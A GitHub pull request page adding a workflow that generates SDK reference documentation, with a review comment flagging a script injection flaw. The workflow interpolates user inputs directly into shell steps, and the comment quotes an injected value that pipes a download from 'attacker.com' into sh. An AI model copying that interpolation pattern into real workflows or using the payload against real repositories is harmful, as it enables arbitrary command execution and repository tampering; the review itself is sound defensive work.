-
Notifications
You must be signed in to change notification settings - Fork 5
Feature: SDK Reference generation & hosting #78
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
ben-fornefeld
wants to merge
19
commits into
main
Choose a base branch
from
feature-sdk-reference-generation-inside-e2b-devdocs-eng-3413
base: main
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Changes from all commits
Commits
Show all changes
19 commits
Select commit
Hold shift + click to select a range
1d46a34
wip: sdk reference generation workflow
ben-fornefeld 254049f
Refactor SDK reference generation workflow
ben-fornefeld f75a36f
Enhance SDK navigation and styling
ben-fornefeld 1927687
cleanup
ben-fornefeld 81afe32
fix: sdks.json
ben-fornefeld e97acb3
Enhance SDK reference generation and configuration
ben-fornefeld a191e97
improve: better idempotency comparison
ben-fornefeld ddcf32a
cleanup
ben-fornefeld 3890aa2
refactor: bash to typescript generator
ben-fornefeld c0ecf0b
cleanup:
ben-fornefeld cb7be7f
refactor: migrate SDK configuration from JSON to TypeScript
ben-fornefeld 24b4430
refactor: improve SDK reference generation and navigation
ben-fornefeld 87e0c1d
chore: remove package.json and pnpm-lock.yaml
ben-fornefeld 89d8116
fix: config
ben-fornefeld c9f0fd6
refactor: update SDK configuration and improve generation logic
ben-fornefeld 9ce811f
chore
ben-fornefeld a0aa2e4
cleanup
ben-fornefeld 38682df
refactor: improve error handling and logging in CLI and generator
ben-fornefeld 42c4f4f
add: last 3 versions of all sdks to docs
ben-fornefeld File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,113 @@ | ||
| name: Sync SDK Reference Documentation | ||
|
|
||
| on: | ||
| # manual trigger with inputs | ||
| workflow_dispatch: | ||
| inputs: | ||
| sdk: | ||
| description: "SDK to generate (see sdks.config.ts for available SDKs, or use 'all')" | ||
| required: true | ||
| default: "all" | ||
| type: string | ||
| version: | ||
| description: "Version to generate (all, latest, or specific like v2.9.0)" | ||
| required: true | ||
| default: "all" | ||
| type: string | ||
|
|
||
| # triggered from e2b-dev/e2b repo on release | ||
| repository_dispatch: | ||
| types: [sdk-release] | ||
|
|
||
| jobs: | ||
| generate: | ||
| runs-on: ubuntu-latest | ||
| permissions: | ||
| contents: write | ||
|
|
||
| steps: | ||
| - name: Checkout docs repo | ||
| uses: actions/checkout@v4 | ||
| with: | ||
| fetch-depth: 0 | ||
|
|
||
| - name: Setup Node.js | ||
| uses: actions/setup-node@v4 | ||
| with: | ||
| node-version: "20" | ||
|
|
||
| - name: Install pnpm | ||
| uses: pnpm/action-setup@v4 | ||
| with: | ||
| version: 9 | ||
|
|
||
| - name: Setup Python | ||
| uses: actions/setup-python@v5 | ||
| with: | ||
| python-version: "3.11" | ||
|
|
||
| - name: Install generator dependencies | ||
| working-directory: sdk-reference-generator | ||
| run: pnpm install --frozen-lockfile | ||
|
|
||
| - name: Install Python dependencies | ||
| run: pip install -r requirements.txt | ||
|
|
||
| - name: Install Poetry | ||
| run: pip install poetry | ||
|
|
||
| - name: Determine SDK and Version | ||
| id: params | ||
| run: | | ||
| if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then | ||
| SDK="${{ github.event.inputs.sdk }}" | ||
| VERSION="${{ github.event.inputs.version }}" | ||
| elif [[ "${{ github.event_name }}" == "repository_dispatch" ]]; then | ||
| SDK="${{ github.event.client_payload.sdk }}" | ||
| # on repository_dispatch, default to "all" to auto-detect missing versions | ||
| VERSION="${{ github.event.client_payload.version }}" | ||
| VERSION="${VERSION:-all}" | ||
| fi | ||
|
|
||
| echo "sdk=${SDK:-all}" >> $GITHUB_OUTPUT | ||
| echo "version=${VERSION:-all}" >> $GITHUB_OUTPUT | ||
|
|
||
| - name: Generate SDK Reference | ||
| working-directory: sdk-reference-generator | ||
| run: | | ||
| pnpm run generate \ | ||
| --sdk "${{ steps.params.outputs.sdk }}" \ | ||
| --version "${{ steps.params.outputs.version }}" | ||
|
|
||
| - name: Verify generated files | ||
| run: | | ||
| echo "Generated SDK reference files:" | ||
| find docs/sdk-reference -type f -name "*.mdx" 2>/dev/null | head -20 || echo "No MDX files found" | ||
|
|
||
| - name: Commit and push changes | ||
| run: | | ||
| git config user.name "github-actions[bot]" | ||
| git config user.email "github-actions[bot]@users.noreply.github.com" | ||
|
|
||
| git add docs/sdk-reference/ | ||
| git add docs.json | ||
|
|
||
| if git diff --staged --quiet; then | ||
| echo "No changes to commit" | ||
| else | ||
| git commit -m "[skip ci] Update SDK reference: ${{ steps.params.outputs.sdk }} ${{ steps.params.outputs.version }}" | ||
| git push | ||
| fi | ||
|
|
||
| - name: Summary | ||
| run: | | ||
| echo "## SDK Reference Generation Complete" >> $GITHUB_STEP_SUMMARY | ||
| echo "" >> $GITHUB_STEP_SUMMARY | ||
| echo "- **SDK**: ${{ steps.params.outputs.sdk }}" >> $GITHUB_STEP_SUMMARY | ||
| echo "- **Version**: ${{ steps.params.outputs.version }}" >> $GITHUB_STEP_SUMMARY | ||
| echo "" >> $GITHUB_STEP_SUMMARY | ||
| echo "### Generated Files" >> $GITHUB_STEP_SUMMARY | ||
| echo '```' >> $GITHUB_STEP_SUMMARY | ||
| find docs/sdk-reference -type f -name "*.mdx" | wc -l | xargs echo "Total MDX files:" >> $GITHUB_STEP_SUMMARY | ||
| find docs/sdk-reference -type f -name "*.mdx" >> $GITHUB_STEP_SUMMARY || true | ||
| echo '```' >> $GITHUB_STEP_SUMMARY | ||
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,2 +1,7 @@ | ||
| .idea | ||
| .DS_Store | ||
|
|
||
| node_modules | ||
|
|
||
| # Generated SDK navigation (intermediate file) | ||
| sdk_navigation.json |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| sdk-reference-generator/ | ||
|
|
||
| scripts/ |
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Workflow input injection allows arbitrary command execution
High Severity
The workflow directly interpolates user-controlled inputs (
github.event.inputs.sdk,github.event.inputs.version,github.event.client_payload.sdk,github.event.client_payload.version) into shell scripts using${{ }}expressions. This is a script injection vulnerability - if a user with write access provides malicious input like"; curl attacker.com/malicious.sh | sh; echo ", it breaks out of the quoted string and executes arbitrary commands. The workflow hascontents: writepermission, allowing attackers to modify repository contents. The safe pattern is to use environment variables instead of direct interpolation.